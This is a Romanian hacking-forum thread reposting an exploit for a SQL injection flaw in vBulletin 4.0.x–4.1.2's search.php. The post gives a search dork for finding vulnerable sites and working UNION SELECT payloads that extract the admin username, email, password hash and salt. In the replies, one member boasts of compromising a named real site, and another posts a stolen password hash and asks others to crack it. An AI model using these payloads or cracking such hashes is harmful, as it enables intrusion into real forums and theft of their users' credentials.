Jump to content
Nytro

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================

Sursa: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

E public (thanks "d") de ceva timp, dar vad ca acum apare si pe exploit-db.

Video Demonstration by TinK:

trxtxx Newbie

trxtxx

Posted
Posted

ba astia nu pot sa se abtina sa nu devina ei faimosi :( au distrus bunatate de exploit. Nu i-am inteles niciodata pe astia ce vor sa publice ei tot si nici macar nu sunt ale lor in marea majoritate a cazurilor.

xpaulx Newbie

xpaulx

Posted
Posted (edited)

Poftiti o scurta demonstratie facuta de mine pe alphazone.ro acum o luna: Alphazone Pwned on Vimeo

@paul4games: nu , nu el a gasit vulnerabilitatea. Tipul asta care a postat-o pe 1337day si exploit-db e un skid de pe hackforums pe nume majidemo.

Edited by xpaulx
  • Upvote 1
marcus21 Newbie

marcus21

Posted
Posted (edited)

baza de date nu o poti lua asa doar dupa ce faci rost de user si parola de la admin si atunci deabea poti sa o furi

edit: reuseste careva sa gaseasca parola?

Leonight : d4644b1f0c83a6686f47cf67215c4fa6

Edited by marcus21

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...